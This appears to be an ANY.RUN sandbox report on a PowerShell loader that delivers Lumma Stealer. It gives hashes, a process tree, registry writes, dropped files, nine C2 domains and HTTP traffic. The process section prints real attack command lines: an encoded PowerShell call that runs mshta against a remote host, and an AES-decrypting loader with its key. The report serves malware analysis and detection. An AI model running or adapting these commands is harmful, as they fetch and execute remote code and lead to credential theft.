File name:

continuesurf.b-cdn.net.ps1

Full analysis: https://app.any.run/tasks/4b452f9e-cbac-44ee-a741-eb1e6a75edf8
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: August 25, 2024, 13:22:11
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
lumma
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

3693D54BC3E0A508EEFA28F951CC8E68

SHA1:

963018C74563181FB8F60BAA032CE8CC018CFD0D

SHA256:

8B24E9E9CEDAA214EF125BC43217E83A0B46EB7BF759A2AD7C735D5D75CA95C8

SSDEEP:

3:VSJJLNyAmarBO/tmt55akuBtzsqXg2JHbPROkJ+NGwlnYn:snyuk854kuBx5XdJ1OkUNGT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6720)
    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 6992)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6340)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 6992)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Stealers network behavior

      • BitLockerToGo.exe (PID: 6552)
    • LUMMA has been detected (SURICATA)

      • BitLockerToGo.exe (PID: 6552)
    • Actions looks like stealing of personal data

      • BitLockerToGo.exe (PID: 6552)
    • LUMMA has been detected (YARA)

      • BitLockerToGo.exe (PID: 6552)
  • SUSPICIOUS

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 6720)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6720)
      • mshta.exe (PID: 6992)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 6720)
    • Application launched itself

      • powershell.exe (PID: 6720)
    • Process drops legitimate windows executable

      • mshta.exe (PID: 6992)
      • powershell.exe (PID: 6340)
    • Drops the executable file immediately after the start

      • mshta.exe (PID: 6992)
      • powershell.exe (PID: 6340)
    • Executable content was dropped or overwritten

      • mshta.exe (PID: 6992)
      • powershell.exe (PID: 6340)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 6992)
    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 6992)
    • Cryptography encrypted command line is found

      • powershell.exe (PID: 6340)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Searches for installed software

      • BitLockerToGo.exe (PID: 6552)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 6992)
    • Checks proxy server information

      • mshta.exe (PID: 6992)
      • powershell.exe (PID: 6340)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Checks supported languages

      • 0qbittorrent.exe (PID: 6572)
      • BitLockerToGo.exe (PID: 6552)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6340)
    • Disables trace logs

      • powershell.exe (PID: 6340)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6340)
    • The executable file from the user directory is run by the Powershell process

      • 0qbittorrent.exe (PID: 6572)
    • Reads the computer name

      • BitLockerToGo.exe (PID: 6552)
    • Reads the software policy settings

      • BitLockerToGo.exe (PID: 6552)
    • Reads the machine GUID from the registry

      • BitLockerToGo.exe (PID: 6552)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Lumma

(PID) Process: (6552) BitLockerToGo.exe
C2 (9):
condedqpwqm.shop
stagedchheiqwo.shop
traineiwnqo.shop
greetycruthsuo.shop
locatedblsoqp.shop
caffegclasiqwp.shop
evoliutwoqm.shop
millyscroqwp.shop
stamppreewntnq.shop
All screenshots are available in the full report
Total processes
130
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Process chain as drawn in the report ("no specs" is the report's label for a process with no signatures):
start
  powershell.exe (no specs)
  conhost.exe (no specs)
  powershell.exe (no specs)
  mshta.exe
  powershell.exe
  conhost.exe (no specs)
  0qbittorrent.exe (no specs)
  bitlockertogo.exe (#LUMMA)

Process information

PID
CMD
Path
Indicators
Parent process
PID:
6340
CMD:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function oantqH($trGRPsJe){return -split ($trGRPsJe -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$dMqhbGM = oantq[…]ystem.Security.Cryptography.Aes]::Create();$BITXV.Key = oantqH('4847504162676B4452496B5450714854');$BITXV.IV = New-Object byte[] 16;$saEXwRZF = $BITXV.CreateDecryptor();$NTWbdtzUh = $saEXwRZF.TransformFinalBlock($dMqhbGM, 0, $dMqhbGM.Length);$hGlciEwhV = [System.Text.Encoding]::Utf8.GetString($NTWbdtzUh);$saEXwRZF.Dispose();& $hGlciEwhV.Substring(0,3) $hGlciEwhV.Substring(3)
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID:
6448
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
6552
CMD:
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Path:
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Parent process:
0qbittorrent.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BitLocker To Go Reader
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
PID:
6572
CMD:
"C:\Users\admin\AppData\Local\Temp\0qbittorrent.exe"
Path:
C:\Users\admin\AppData\Local\Temp\0qbittorrent.exe
Parent process:
powershell.exe
User:
admin
Company:
The qBittorrent project
Integrity Level:
MEDIUM
Description:
qBittorrent - A Bittorrent Client
Exit code:
666
Version:
4.6.6
Modules
Images
c:\users\admin\appdata\local\temp\0qbittorrent.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\powrprof.dll
PID:
6720
CMD:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\continuesurf.b-cdn.net.ps1
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
6728
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
6856
CMD:
"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAHEAdQBlAHMAdABlAGQALQBmAGkAbABlAC4AYgAtAGMAZABuAC4AbgBlAHQALwBmAGwAYQByAGUAIgA=
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
6992
CMD:
"C:\WINDOWS\system32\mshta.exe" https://requested-file.b-cdn.net/flare
Path:
C:\Windows\System32\mshta.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
Total events
31 144
Read events
30 865
Write events
279
Delete events
0

Modification events

Process: (6992) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

Process: (6992) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

Process: (6992) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

Process: (6992) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

Process: (6992) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

Process: (6992) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

Process: (6992) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

Process: (6340) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

Process: (6340) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

Process: (6340) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0
Executable files
8
Suspicious files
5
Text files
6
Unknown types
0

Dropped files

PID / Process / Filename / Type

6720 powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Type: binary
MD5: C8CF02268AC55AB08CA397B680CE4207
SHA256: 93C35E86DC9E882777B010715386FE13D448D42A03AF597EB6A38F3E93977E10

6856 powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bihlixl2.nxs.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6856 powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: 67C8EBE2C761AAEE0D12BB548D684798
SHA256: B185DD58E43A9FD66670A67891F8EF261A337872972B088C586E26F0E690C01F

6340 powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\flare.zip
Type: compressed
MD5: 7BB3A528B30078266A15AD218016B39D
SHA256: 74B7279CFBD8B3B4079E16E3E915F82689623A519C3F959CE2D592D1A47CA933

6340 powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s53hr1hq.ojs.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6992 mshta.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\flare[1]
Type: executable
MD5: 09F4501EE00227510BC199B337B40A8D
SHA256: 57635927148887F6229AE8B140BB74B172394994D80696991903DCD4496FD04C

6340 powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_atrxkfoh.sce.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6340 powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\wvrcimprov.dll
Type: executable
MD5: 3FA3F6F84B1ACB7CFBE329CFEAD0687A
SHA256: EF464FA7D015CD47C1AE7115676B7B3B8327AB6DB3C35562E2CEE79EA116372E

6720 powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hihkloht.343.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6720 powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PGNDK9KRWM1PTEUN1HDI.temp
Type: binary
MD5: C8CF02268AC55AB08CA397B680CE4207
SHA256: 93C35E86DC9E882777B010715386FE13D448D42A03AF597EB6A38F3E93977E10
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
22
DNS requests
4
Threats
1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
(cells left empty in the report are shown as "-")
- | - | GET | 200 | 169.150.247.35:443 | https://requested-file.b-cdn.net/flare | - | executable | 161 Kb | unknown
- | - | POST | 200 | 104.21.28.66:443 | https://greetycruthsuo.shop/api | - | text | 2 b | unknown
- | - | GET | 200 | 169.150.247.35:443 | https://requested-file.b-cdn.net/flare.zip | - | compressed | 9.30 Mb | unknown
- | - | POST | 200 | 104.21.28.66:443 | https://greetycruthsuo.shop/api | - | text | 15 b | unknown
- | - | POST | 200 | 172.67.144.151:443 | https://greetycruthsuo.shop/api | - | text | 15.1 Kb | unknown
- | - | POST | 200 | 172.67.144.151:443 | https://greetycruthsuo.shop/api | - | text | 15 b | unknown
- | - | POST | 200 | 104.21.28.66:443 | https://greetycruthsuo.shop/api | - | text | 15 b | unknown
- | - | POST | 200 | 104.21.28.66:443 | https://greetycruthsuo.shop/api | - | text | 15 b | unknown
- | - | POST | 200 | 172.67.144.151:443 | https://greetycruthsuo.shop/api | - | text | 48 b | unknown
- | - | POST | 200 | 172.67.144.151:443 | https://greetycruthsuo.shop/api | - | text | 15 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
(cells left empty in the report are shown as "-")
- | - | 192.168.100.255:138 | - | - | - | whitelisted
1292 | svchost.exe | 20.73.194.208:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3308 | RUXIMICS.exe | 20.73.194.208:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2120 | MoUsoCoreWorker.exe | 20.73.194.208:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1292 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2120 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3888 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
6992 | mshta.exe | 169.150.247.35:443 | requested-file.b-cdn.net | - | GB | unknown
4324 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
6340 | powershell.exe | 169.150.247.35:443 | requested-file.b-cdn.net | - | GB | unknown

DNS requests

Domain | IP | Reputation
google.com | 142.250.185.238 | whitelisted
settings-win.data.microsoft.com | 4.231.128.59 | whitelisted
requested-file.b-cdn.net | 169.150.247.35 | whitelisted
greetycruthsuo.shop | 172.67.144.151, 104.21.28.66 | malicious

Threats

PID | Process | Class | Message
6552 | BitLockerToGo.exe | A Network Trojan was detected | STEALER [ANY.RUN] Lumma Stealer TLS Connection